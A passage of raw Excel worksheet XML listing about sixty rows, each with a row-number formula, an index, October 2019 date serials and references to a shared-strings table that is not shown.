        <v>24250</v>
      </c>
    </row>
    <row r="13871" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13871">
        <f t="shared" si="216"/>
        <v>13870</v>
      </c>
      <c r="B13871">
        <v>3870</v>
      </c>
      <c r="C13871" t="s">
        <v>19637</v>
      </c>
      <c r="D13871" s="1">
        <v>43750</v>
      </c>
      <c r="F13871" t="s">
        <v>10526</v>
      </c>
      <c r="G13871" t="s">
        <v>24251</v>
      </c>
    </row>
    <row r="13872" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13872">
        <f t="shared" si="216"/>
        <v>13871</v>
      </c>
      <c r="B13872">
        <v>3871</v>
      </c>
      <c r="C13872" t="s">
        <v>19637</v>
      </c>
      <c r="D13872" s="1">
        <v>43747</v>
      </c>
      <c r="E13872" t="s">
        <v>19680</v>
      </c>
      <c r="F13872" t="s">
        <v>10021</v>
      </c>
      <c r="G13872" t="s">
        <v>24252</v>
      </c>
    </row>
    <row r="13873" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13873">
        <f t="shared" si="216"/>
        <v>13872</v>
      </c>
      <c r="B13873">
        <v>3872</v>
      </c>
      <c r="C13873" t="s">
        <v>19637</v>
      </c>
      <c r="D13873" s="1">
        <v>43752</v>
      </c>
      <c r="E13873" t="s">
        <v>19840</v>
      </c>
      <c r="F13873" t="s">
        <v>10021</v>
      </c>
      <c r="G13873" t="s">
        <v>24253</v>
      </c>
    </row>
    <row r="13874" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13874">
        <f t="shared" si="216"/>
        <v>13873</v>
      </c>
      <c r="B13874">
        <v>3873</v>
      </c>
      <c r="C13874" t="s">
        <v>19637</v>
      </c>
      <c r="D13874" s="1">
        <v>43750</v>
      </c>
      <c r="E13874" t="s">
        <v>24254</v>
      </c>
      <c r="F13874" t="s">
        <v>9978</v>
      </c>
      <c r="G13874" t="s">
        <v>24255</v>
      </c>
    </row>
    <row r="13875" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13875">
        <f t="shared" si="216"/>
        <v>13874</v>
      </c>
      <c r="B13875">
        <v>3874</v>
      </c>
      <c r="C13875" t="s">
        <v>19637</v>
      </c>
      <c r="D13875" s="1">
        <v>43741</v>
      </c>
      <c r="E13875" t="s">
        <v>22692</v>
      </c>
      <c r="F13875" t="s">
        <v>10021</v>
      </c>
      <c r="G13875" t="s">
        <v>24256</v>
      </c>
    </row>
    <row r="13876" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13876">
        <f t="shared" si="216"/>
        <v>13875</v>
      </c>
      <c r="B13876">
        <v>3875</v>
      </c>
      <c r="C13876" t="s">
        <v>19637</v>
      </c>
      <c r="D13876" s="1">
        <v>43749</v>
      </c>
      <c r="E13876" t="s">
        <v>19879</v>
      </c>
      <c r="F13876" t="s">
        <v>10021</v>
      </c>
      <c r="G13876" t="s">
        <v>24257</v>
      </c>
    </row>
    <row r="13877" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13877">
        <f t="shared" si="216"/>
        <v>13876</v>
      </c>
      <c r="B13877">
        <v>3876</v>
      </c>
      <c r="C13877" t="s">
        <v>19637</v>
      </c>
      <c r="D13877" s="1">
        <v>43749</v>
      </c>
      <c r="F13877" t="s">
        <v>10526</v>
      </c>
      <c r="G13877" t="s">
        <v>24258</v>
      </c>
    </row>
    <row r="13878" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13878">
        <f t="shared" si="216"/>
        <v>13877</v>
      </c>
      <c r="B13878">
        <v>3877</v>
      </c>
      <c r="C13878" t="s">
        <v>19637</v>
      </c>
      <c r="D13878" s="1">
        <v>43750</v>
      </c>
      <c r="E13878" t="s">
        <v>19680</v>
      </c>
      <c r="F13878" t="s">
        <v>10021</v>
      </c>
      <c r="G13878" t="s">
        <v>24259</v>
      </c>
    </row>
    <row r="13879" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13879">
        <f t="shared" si="216"/>
        <v>13878</v>
      </c>
      <c r="B13879">
        <v>3878</v>
      </c>
      <c r="C13879" t="s">
        <v>19637</v>
      </c>
      <c r="D13879" s="1">
        <v>43743</v>
      </c>
      <c r="E13879" t="s">
        <v>19687</v>
      </c>
      <c r="F13879" t="s">
        <v>10021</v>
      </c>
      <c r="G13879" t="s">
        <v>24260</v>
      </c>
    </row>
    <row r="13880" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13880">
        <f t="shared" si="216"/>
        <v>13879</v>
      </c>
      <c r="B13880">
        <v>3879</v>
      </c>
      <c r="C13880" t="s">
        <v>19637</v>
      </c>
      <c r="D13880" s="1">
        <v>43748</v>
      </c>
      <c r="E13880" t="s">
        <v>21822</v>
      </c>
      <c r="F13880" t="s">
        <v>9978</v>
      </c>
      <c r="G13880" t="s">
        <v>24261</v>
      </c>
    </row>
    <row r="13881" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13881">
        <f t="shared" si="216"/>
        <v>13880</v>
      </c>
      <c r="B13881">
        <v>3880</v>
      </c>
      <c r="C13881" t="s">
        <v>19637</v>
      </c>
      <c r="D13881" s="1">
        <v>43747</v>
      </c>
      <c r="E13881" t="s">
        <v>19690</v>
      </c>
      <c r="F13881" t="s">
        <v>9978</v>
      </c>
      <c r="G13881" t="s">
        <v>24262</v>
      </c>
    </row>
    <row r="13882" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13882">
        <f t="shared" si="216"/>
        <v>13881</v>
      </c>
      <c r="B13882">
        <v>3881</v>
      </c>
      <c r="C13882" t="s">
        <v>19637</v>
      </c>
      <c r="D13882" s="1">
        <v>43746</v>
      </c>
      <c r="E13882" t="s">
        <v>20349</v>
      </c>
      <c r="F13882" t="s">
        <v>9978</v>
      </c>
      <c r="G13882" t="s">
        <v>24263</v>
      </c>
    </row>
    <row r="13883" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13883">
        <f t="shared" si="216"/>
        <v>13882</v>
      </c>
      <c r="B13883">
        <v>3882</v>
      </c>
      <c r="C13883" t="s">
        <v>19637</v>
      </c>
      <c r="D13883" s="1">
        <v>43744</v>
      </c>
      <c r="E13883" t="s">
        <v>19690</v>
      </c>
      <c r="F13883" t="s">
        <v>9978</v>
      </c>
      <c r="G13883" t="s">
        <v>24264</v>
      </c>
    </row>
    <row r="13884" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13884">
        <f t="shared" si="216"/>
        <v>13883</v>
      </c>
      <c r="B13884">
        <v>3883</v>
      </c>
      <c r="C13884" t="s">
        <v>19637</v>
      </c>
      <c r="D13884" s="1">
        <v>43742</v>
      </c>
      <c r="E13884" t="s">
        <v>20948</v>
      </c>
      <c r="F13884" t="s">
        <v>10526</v>
      </c>
      <c r="G13884" t="s">
        <v>24265</v>
      </c>
    </row>
    <row r="13885" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13885">
        <f t="shared" si="216"/>
        <v>13884</v>
      </c>
      <c r="B13885">
        <v>3884</v>
      </c>
      <c r="C13885" t="s">
        <v>19637</v>
      </c>
      <c r="D13885" s="1">
        <v>43751</v>
      </c>
      <c r="E13885" t="s">
        <v>19750</v>
      </c>
      <c r="F13885" t="s">
        <v>9978</v>
      </c>
      <c r="G13885" t="s">
        <v>24266</v>
      </c>
    </row>
    <row r="13886" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13886">
        <f t="shared" si="216"/>
        <v>13885</v>
      </c>
      <c r="B13886">
        <v>3885</v>
      </c>
      <c r="C13886" t="s">
        <v>19637</v>
      </c>
      <c r="D13886" s="1">
        <v>43747</v>
      </c>
      <c r="E13886" t="s">
        <v>20767</v>
      </c>
      <c r="F13886" t="s">
        <v>10021</v>
      </c>
      <c r="G13886" t="s">
        <v>24267</v>
      </c>
    </row>
    <row r="13887" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13887">
        <f t="shared" si="216"/>
        <v>13886</v>
      </c>
      <c r="B13887">
        <v>3886</v>
      </c>
      <c r="C13887" t="s">
        <v>19637</v>
      </c>
      <c r="D13887" s="1">
        <v>43745</v>
      </c>
      <c r="E13887" t="s">
        <v>20515</v>
      </c>
      <c r="F13887" t="s">
        <v>10021</v>
      </c>
      <c r="G13887" t="s">
        <v>24268</v>
      </c>
    </row>
    <row r="13888" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13888">
        <f t="shared" si="216"/>
        <v>13887</v>
      </c>
      <c r="B13888">
        <v>3887</v>
      </c>
      <c r="C13888" t="s">
        <v>19637</v>
      </c>
      <c r="D13888" s="1">
        <v>43748</v>
      </c>
      <c r="E13888" t="s">
        <v>24269</v>
      </c>
      <c r="F13888" t="s">
        <v>10526</v>
      </c>
      <c r="G13888" t="s">
        <v>24270</v>
      </c>
    </row>
    <row r="13889" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13889">
        <f t="shared" si="216"/>
        <v>13888</v>
      </c>
      <c r="B13889">
        <v>3888</v>
      </c>
      <c r="C13889" t="s">
        <v>19637</v>
      </c>
      <c r="D13889" s="1">
        <v>43756</v>
      </c>
      <c r="E13889" t="s">
        <v>19672</v>
      </c>
      <c r="F13889" t="s">
        <v>10021</v>
      </c>
      <c r="G13889" t="s">
        <v>24271</v>
      </c>
    </row>
    <row r="13890" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13890">
        <f t="shared" si="216"/>
        <v>13889</v>
      </c>
      <c r="B13890">
        <v>3889</v>
      </c>
      <c r="C13890" t="s">
        <v>19637</v>
      </c>
      <c r="D13890" s="1">
        <v>43741</v>
      </c>
      <c r="E13890" t="s">
        <v>20129</v>
      </c>
      <c r="F13890" t="s">
        <v>10526</v>
      </c>
      <c r="G13890" t="s">
        <v>24272</v>
      </c>
    </row>
    <row r="13891" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13891">
        <f t="shared" ref="A13891:A13954" si="217">+ROW(A13890)</f>
        <v>13890</v>
      </c>
      <c r="B13891">
        <v>3890</v>
      </c>
      <c r="C13891" t="s">
        <v>19637</v>
      </c>
      <c r="D13891" s="1">
        <v>43749</v>
      </c>
      <c r="F13891" t="s">
        <v>10526</v>
      </c>
      <c r="G13891" t="s">
        <v>24273</v>
      </c>
    </row>
    <row r="13892" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13892">
        <f t="shared" si="217"/>
        <v>13891</v>
      </c>
      <c r="B13892">
        <v>3891</v>
      </c>
      <c r="C13892" t="s">
        <v>19637</v>
      </c>
      <c r="D13892" s="1">
        <v>43754</v>
      </c>
      <c r="E13892" t="s">
        <v>19648</v>
      </c>
      <c r="F13892" t="s">
        <v>10021</v>
      </c>
      <c r="G13892" t="s">
        <v>24274</v>
      </c>
    </row>
    <row r="13893" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13893">
        <f t="shared" si="217"/>
        <v>13892</v>
      </c>
      <c r="B13893">
        <v>3892</v>
      </c>
      <c r="C13893" t="s">
        <v>19637</v>
      </c>
      <c r="D13893" s="1">
        <v>43740</v>
      </c>
      <c r="E13893" t="s">
        <v>24275</v>
      </c>
      <c r="F13893" t="s">
        <v>9975</v>
      </c>
      <c r="G13893" t="s">
        <v>24276</v>
      </c>
    </row>
    <row r="13894" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13894">
        <f t="shared" si="217"/>
        <v>13893</v>
      </c>
      <c r="B13894">
        <v>3893</v>
      </c>
      <c r="C13894" t="s">
        <v>19637</v>
      </c>
      <c r="D13894" s="1">
        <v>43739</v>
      </c>
      <c r="E13894" t="s">
        <v>19794</v>
      </c>
      <c r="F13894" t="s">
        <v>10526</v>
      </c>
      <c r="G13894" t="s">
        <v>24277</v>
      </c>
    </row>
    <row r="13895" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13895">
        <f t="shared" si="217"/>
        <v>13894</v>
      </c>
      <c r="B13895">
        <v>3894</v>
      </c>
      <c r="C13895" t="s">
        <v>19637</v>
      </c>
      <c r="D13895" s="1">
        <v>43757</v>
      </c>
      <c r="E13895" t="s">
        <v>19640</v>
      </c>
      <c r="F13895" t="s">
        <v>9975</v>
      </c>
      <c r="G13895" t="s">
        <v>24278</v>
      </c>
    </row>
    <row r="13896" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13896">
        <f t="shared" si="217"/>
        <v>13895</v>
      </c>
      <c r="B13896">
        <v>3895</v>
      </c>
      <c r="C13896" t="s">
        <v>19637</v>
      </c>
      <c r="D13896" s="1">
        <v>43743</v>
      </c>
      <c r="E13896" t="s">
        <v>19959</v>
      </c>
      <c r="F13896" t="s">
        <v>10021</v>
      </c>
      <c r="G13896" t="s">
        <v>24279</v>
      </c>
    </row>
    <row r="13897" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13897">
        <f t="shared" si="217"/>
        <v>13896</v>
      </c>
      <c r="B13897">
        <v>3896</v>
      </c>
      <c r="C13897" t="s">
        <v>19637</v>
      </c>
      <c r="D13897" s="1">
        <v>43756</v>
      </c>
      <c r="F13897" t="s">
        <v>10526</v>
      </c>
      <c r="G13897" t="s">
        <v>24280</v>
      </c>
    </row>
    <row r="13898" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13898">
        <f t="shared" si="217"/>
        <v>13897</v>
      </c>
      <c r="B13898">
        <v>3897</v>
      </c>
      <c r="C13898" t="s">
        <v>19637</v>
      </c>
      <c r="D13898" s="1">
        <v>43748</v>
      </c>
      <c r="E13898" t="s">
        <v>20774</v>
      </c>
      <c r="F13898" t="s">
        <v>10526</v>
      </c>
      <c r="G13898" t="s">
        <v>24142</v>
      </c>
    </row>
    <row r="13899" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13899">
        <f t="shared" si="217"/>
        <v>13898</v>
      </c>
      <c r="B13899">
        <v>3898</v>
      </c>
      <c r="C13899" t="s">
        <v>19637</v>
      </c>
      <c r="D13899" s="1">
        <v>43757</v>
      </c>
      <c r="E13899" t="s">
        <v>19640</v>
      </c>
      <c r="F13899" t="s">
        <v>10021</v>
      </c>
      <c r="G13899" t="s">
        <v>24281</v>
      </c>
    </row>
    <row r="13900" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13900">
        <f t="shared" si="217"/>
        <v>13899</v>
      </c>
      <c r="B13900">
        <v>3899</v>
      </c>
      <c r="C13900" t="s">
        <v>19637</v>
      </c>
      <c r="D13900" s="1">
        <v>43747</v>
      </c>
      <c r="E13900" t="s">
        <v>24282</v>
      </c>
      <c r="F13900" t="s">
        <v>10526</v>
      </c>
      <c r="G13900" t="s">
        <v>24283</v>
      </c>
    </row>
    <row r="13901" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13901">
        <f t="shared" si="217"/>
        <v>13900</v>
      </c>
      <c r="B13901">
        <v>3900</v>
      </c>
      <c r="C13901" t="s">
        <v>19637</v>
      </c>
      <c r="D13901" s="1">
        <v>43746</v>
      </c>
      <c r="F13901" t="s">
        <v>10526</v>
      </c>
      <c r="G13901" t="s">
        <v>24284</v>
      </c>
    </row>
    <row r="13902" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13902">
        <f t="shared" si="217"/>
        <v>13901</v>
      </c>
      <c r="B13902">
        <v>3901</v>
      </c>
      <c r="C13902" t="s">
        <v>19637</v>
      </c>
      <c r="D13902" s="1">
        <v>43739</v>
      </c>
      <c r="F13902" t="s">
        <v>10526</v>
      </c>
      <c r="G13902" t="s">
        <v>24285</v>
      </c>
    </row>
    <row r="13903" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13903">
        <f t="shared" si="217"/>
        <v>13902</v>
      </c>
      <c r="B13903">
        <v>3902</v>
      </c>
      <c r="C13903" t="s">
        <v>19637</v>
      </c>
      <c r="D13903" s="1">
        <v>43747</v>
      </c>
      <c r="E13903" t="s">
        <v>24286</v>
      </c>
      <c r="F13903" t="s">
        <v>9978</v>
      </c>
      <c r="G13903" t="s">
        <v>24287</v>
      </c>
    </row>
    <row r="13904" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13904">
        <f t="shared" si="217"/>
        <v>13903</v>
      </c>
      <c r="B13904">
        <v>3903</v>
      </c>
      <c r="C13904" t="s">
        <v>19637</v>
      </c>
      <c r="D13904" s="1">
        <v>43739</v>
      </c>
      <c r="E13904" t="s">
        <v>19643</v>
      </c>
      <c r="F13904" t="s">
        <v>10021</v>
      </c>
      <c r="G13904" t="s">
        <v>24288</v>
      </c>
    </row>
    <row r="13905" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13905">
        <f t="shared" si="217"/>
        <v>13904</v>
      </c>
      <c r="B13905">
        <v>3904</v>
      </c>
      <c r="C13905" t="s">
        <v>19637</v>
      </c>
      <c r="D13905" s="1">
        <v>43746</v>
      </c>
      <c r="E13905" t="s">
        <v>19680</v>
      </c>
      <c r="F13905" t="s">
        <v>10021</v>
      </c>
      <c r="G13905" t="s">
        <v>24289</v>
      </c>
    </row>
    <row r="13906" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13906">
        <f t="shared" si="217"/>
        <v>13905</v>
      </c>
      <c r="B13906">
        <v>3905</v>
      </c>
      <c r="C13906" t="s">
        <v>19637</v>
      </c>
      <c r="D13906" s="1">
        <v>43748</v>
      </c>
      <c r="F13906" t="s">
        <v>10526</v>
      </c>
      <c r="G13906" t="s">
        <v>24290</v>
      </c>
    </row>
    <row r="13907" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13907">
        <f t="shared" si="217"/>
        <v>13906</v>
      </c>
      <c r="B13907">
        <v>3906</v>
      </c>
      <c r="C13907" t="s">
        <v>19637</v>
      </c>
      <c r="D13907" s="1">
        <v>43749</v>
      </c>
      <c r="E13907" t="s">
        <v>24291</v>
      </c>
      <c r="F13907" t="s">
        <v>10526</v>
      </c>
      <c r="G13907" t="s">
        <v>24292</v>
      </c>
    </row>
    <row r="13908" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13908">
        <f t="shared" si="217"/>
        <v>13907</v>
      </c>
      <c r="B13908">
        <v>3907</v>
      </c>
      <c r="C13908" t="s">
        <v>19637</v>
      </c>
      <c r="D13908" s="1">
        <v>43744</v>
      </c>
      <c r="E13908" t="s">
        <v>20253</v>
      </c>
      <c r="F13908" t="s">
        <v>9978</v>
      </c>
      <c r="G13908" t="s">
        <v>24293</v>
      </c>
    </row>
    <row r="13909" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13909">
        <f t="shared" si="217"/>
        <v>13908</v>
      </c>
      <c r="B13909">
        <v>3908</v>
      </c>
      <c r="C13909" t="s">
        <v>19637</v>
      </c>
      <c r="D13909" s="1">
        <v>43748</v>
      </c>
      <c r="F13909" t="s">
        <v>10526</v>
      </c>
      <c r="G13909" t="s">
        <v>24294</v>
      </c>
    </row>
    <row r="13910" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13910">
        <f t="shared" si="217"/>
        <v>13909</v>
      </c>
      <c r="B13910">
        <v>3909</v>
      </c>
      <c r="C13910" t="s">
        <v>19637</v>
      </c>
      <c r="D13910" s="1">
        <v>43744</v>
      </c>
      <c r="E13910" t="s">
        <v>19640</v>
      </c>
      <c r="F13910" t="s">
        <v>10021</v>
      </c>
      <c r="G13910" t="s">
        <v>24295</v>
      </c>
    </row>
    <row r="13911" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13911">
        <f t="shared" si="217"/>
        <v>13910</v>
      </c>
      <c r="B13911">
        <v>3910</v>
      </c>
      <c r="C13911" t="s">
        <v>19637</v>
      </c>
      <c r="D13911" s="1">
        <v>43747</v>
      </c>
      <c r="E13911" t="s">
        <v>21759</v>
      </c>
      <c r="F13911" t="s">
        <v>9978</v>
      </c>
      <c r="G13911" t="s">
        <v>24296</v>
      </c>
    </row>
    <row r="13912" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13912">
        <f t="shared" si="217"/>
        <v>13911</v>
      </c>
      <c r="B13912">
        <v>3911</v>
      </c>
      <c r="C13912" t="s">
        <v>19637</v>
      </c>
      <c r="D13912" s="1">
        <v>43740</v>
      </c>
      <c r="E13912" t="s">
        <v>20293</v>
      </c>
      <c r="F13912" t="s">
        <v>10526</v>
      </c>
      <c r="G13912" t="s">
        <v>24297</v>
      </c>
    </row>
    <row r="13913" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13913">
        <f t="shared" si="217"/>
        <v>13912</v>
      </c>
      <c r="B13913">
        <v>3912</v>
      </c>
      <c r="C13913" t="s">
        <v>19637</v>
      </c>
      <c r="D13913" s="1">
        <v>43745</v>
      </c>
      <c r="E13913" t="s">
        <v>19640</v>
      </c>
      <c r="F13913" t="s">
        <v>9975</v>
      </c>
      <c r="G13913" t="s">
        <v>24298</v>
      </c>
    </row>
    <row r="13914" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13914">
        <f t="shared" si="217"/>
        <v>13913</v>
      </c>
      <c r="B13914">
        <v>3913</v>
      </c>
      <c r="C13914" t="s">
        <v>19637</v>
      </c>
      <c r="D13914" s="1">
        <v>43747</v>
      </c>
      <c r="E13914" t="s">
        <v>21090</v>
      </c>
      <c r="F13914" t="s">
        <v>10021</v>
      </c>
      <c r="G13914" t="s">
        <v>24299</v>
      </c>
    </row>
    <row r="13915" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13915">
        <f t="shared" si="217"/>
        <v>13914</v>
      </c>
      <c r="B13915">
        <v>3914</v>
      </c>
      <c r="C13915" t="s">
        <v>19637</v>
      </c>
      <c r="D13915" s="1">
        <v>43754</v>
      </c>
      <c r="E13915" t="s">
        <v>20704</v>
      </c>
      <c r="F13915" t="s">
        <v>10526</v>
      </c>
      <c r="G13915" t="s">
        <v>24300</v>
      </c>
    </row>
    <row r="13916" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13916">
        <f t="shared" si="217"/>
        <v>13915</v>
      </c>
      <c r="B13916">
        <v>3915</v>
      </c>
      <c r="C13916" t="s">
        <v>19637</v>
      </c>
      <c r="D13916" s="1">
        <v>43742</v>
      </c>
      <c r="E13916" t="s">
        <v>19750</v>
      </c>
      <c r="F13916" t="s">
        <v>9978</v>
      </c>
      <c r="G13916" t="s">
        <v>24301</v>
      </c>
    </row>
    <row r="13917" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13917">
        <f t="shared" si="217"/>
        <v>13916</v>
      </c>
      <c r="B13917">
        <v>3916</v>
      </c>
      <c r="C13917" t="s">
        <v>19637</v>
      </c>
      <c r="D13917" s="1">
        <v>43746</v>
      </c>
      <c r="E13917" t="s">
        <v>19643</v>
      </c>
      <c r="F13917" t="s">
        <v>10021</v>
      </c>
      <c r="G13917" t="s">
        <v>24302</v>
      </c>
    </row>
    <row r="13918" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13918">
        <f t="shared" si="217"/>
        <v>13917</v>
      </c>
      <c r="B13918">
        <v>3917</v>
      </c>
      <c r="C13918" t="s">
        <v>19637</v>
      </c>
      <c r="D13918" s="1">
        <v>43754</v>
      </c>
      <c r="E13918" t="s">
        <v>24303</v>
      </c>
      <c r="F13918" t="s">
        <v>10526</v>
      </c>
      <c r="G13918" t="s">
        <v>24304</v>
      </c>
    </row>
    <row r="13919" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13919">
        <f t="shared" si="217"/>
        <v>13918</v>
      </c>
      <c r="B13919">
        <v>3918</v>
      </c>
      <c r="C13919" t="s">
        <v>19637</v>
      </c>
      <c r="D13919" s="1">
        <v>43748</v>
      </c>
      <c r="E13919" t="s">
        <v>24305</v>
      </c>
      <c r="F13919" t="s">
        <v>10526</v>
      </c>
      <c r="G13919" t="s">
        <v>24306</v>
      </c>
    </row>
    <row r="13920" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13920">
        <f t="shared" si="217"/>
        <v>13919</v>
      </c>
      <c r="B13920">
        <v>3919</v>
      </c>
      <c r="C13920" t="s">
        <v>19637</v>
      </c>
      <c r="D13920" s="1">
        <v>43754</v>
      </c>
      <c r="E13920" t="s">
        <v>20929</v>
      </c>
      <c r="F13920" t="s">
        <v>10526</v>
      </c>
      <c r="G13920" t="s">
        <v>24307</v>
      </c>
    </row>
    <row r="13921" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13921">
        <f t="shared" si="217"/>
        <v>13920</v>
      </c>
      <c r="B13921">
        <v>3920</v>
      </c>
      <c r="C13921" t="s">
        <v>19637</v>
      </c>
      <c r="D13921" s="1">
        <v>43742</v>
      </c>
      <c r="F13921" t="s">
        <v>10526</v>
      </c>
      <c r="G13921" t="s">
        <v>24308</v>
      </c>
    </row>
    <row r="13922" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13922">
        <f t="shared" si="217"/>
        <v>13921</v>
      </c>
      <c r="B13922">
        <v>3921</v>
      </c>
      <c r="C13922" t="s">
        <v>19637</v>
      </c>
      <c r="D13922" s="1">
        <v>43739</v>
      </c>
      <c r="E13922" t="s">
        <v>20005</v>
      </c>
      <c r="F13922" t="s">
        <v>9975</v>
      </c>
      <c r="G13922" t="s">
        <v>24309</v>
      </c>
    </row>
    <row r="13923" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13923">
        <f t="shared" si="217"/>
        <v>13922</v>
      </c>
      <c r="B13923">
        <v>3922</v>
      </c>
      <c r="C13923" t="s">
        <v>19637</v>
      </c>
      <c r="D13923" s="1">
        <v>43738</v>
      </c>
      <c r="E13923" t="s">
        <v>20228</v>
      </c>
      <c r="F13923" t="s">
        <v>10021</v>
      </c>
      <c r="G13923" t="s">
        <v>24310</v>
      </c>
    </row>
    <row r="13924" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13924">
        <f t="shared" si="217"/>
        <v>13923</v>
      </c>
      <c r="B13924">
        <v>3923</v>
      </c>
      <c r="C13924" t="s">
        <v>19637</v>
      </c>
      <c r="D13924" s="1">
        <v>43747</v>
      </c>
      <c r="F13924" t="s">
        <v>10021</v>
      </c>
      <c r="G13924" t="s">
        <v>24311</v>
      </c>
    </row>
    <row r="13925" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13925">
        <f t="shared" si="217"/>
        <v>13924</v>
      </c>
      <c r="B13925">
        <v>3924</v>
      </c>
      <c r="C13925" t="s">
        <v>19637</v>
      </c>
      <c r="D13925" s="1">
        <v>43752</v>
      </c>
      <c r="E13925" t="s">
        <v>24312</v>
      </c>
      <c r="F13925" t="s">
        <v>10526</v>
      </c>
      <c r="G13925" t="s">
        <v>24313</v>
      </c>
    </row>
    <row r="13926" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13926">
        <f t="shared" si="217"/>
        <v>13925</v>
      </c>
      <c r="B13926">
        <v>3925</v>
      </c>
      <c r="C13926" t="s">
        <v>19637</v>
      </c>
      <c r="D13926" s="1">
        <v>43752</v>
      </c>
      <c r="E13926" t="s">
        <v>19640</v>
      </c>
      <c r="F13926" t="s">
        <v>10021</v>
      </c>
      <c r="G13926" t="s">
        <v>24314</v>
      </c>
    </row>
    <row r="13927" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13927">
        <f t="shared" si="217"/>
        <v>13926</v>
      </c>
      <c r="B13927">
        <v>3926</v>
      </c>
      <c r="C13927" t="s">
        <v>19637</v>
      </c>
      <c r="D13927" s="1">
        <v>43750</v>
      </c>
      <c r="E13927" t="s">
        <v>19750</v>
      </c>
      <c r="F13927" t="s">
        <v>9978</v>
      </c>
      <c r="G13927" t="s">
        <v>24315</v>
      </c>
    </row>
    <row r="13928" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13928">
        <f t="shared" si="217"/>
        <v>13927</v>
      </c>
      <c r="B13928">
        <v>3927</v>
      </c>
      <c r="C13928" t="s">
        <v>19637</v>
      </c>
      <c r="D13928" s="1">
        <v>43742</v>
      </c>
      <c r="E13928" t="s">
        <v>19663</v>
      </c>
      <c r="F13928" t="s">
        <v>9975</v>
      </c>
      <c r="G13928" t="s">
        <v>24316</v>
      </c>
    </row>
    <row r="13929" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13929">
        <f t="shared" si="217"/>
        <v>13928</v>
      </c>
      <c r="B13929">
        <v>3928</v>
      </c>
      <c r="C13929" t="s">
        <v>19637</v>
      </c>
      <c r="D13929" s="1">
        <v>43748</v>
      </c>
      <c r="E13929" t="s">
        <v>19640</v>
      </c>
      <c r="F13929" t="s">
        <v>10021</v>
      </c>
      <c r="G13929" t="s">
        <v>24317</v>
      </c>
    </row>
    <row r="13930" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13930">
        <f t="shared" si="217"/>
        <v>13929</v>
      </c>
      <c r="B13930">
        <v>3929</v>
      </c>
      <c r="C13930" t="s">
        <v>19637</v>
      </c>
      <c r="D13930" s="1">
        <v>43756</v>
      </c>
      <c r="F13930" t="s">
        <v>10526</v>
      </c>
      <c r="G13930" t="s">
        <v>24318</v>
      </c>
    </row>
    <row r="13931" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13931">
        <f t="shared" si="217"/>
        <v>13930</v>
      </c>
      <c r="B13931">
        <v>3930</v>
      </c>
      <c r="C13931" t="s">
        <v>19637</v>
      </c>
      <c r="D13931" s="1">
        <v>43744</v>
      </c>
      <c r="F13931" t="s">
        <v>10526</v>
      </c>
      <c r="G13931" t="s">
        <v>24319</v>
      </c>
    </row>
    <row r="13932" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13932">
        <f t="shared" si="217"/>
        <v>13931</v>
      </c>
      <c r="B13932">
        <v>3931</v>
      </c>
      <c r="C13932" t="s">
        <v>19637</v>
      </c>
      <c r="D13932" s="1">
        <v>43740</v>
      </c>
      <c r="E13932" t="s">
        <v>19640</v>
      </c>
      <c r="F13932" t="s">
        <v>10021</v>
      </c>
      <c r="G13932" t="s">
        <v>24320</v>
      </c>
    </row>
    <row r="13933" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13933">
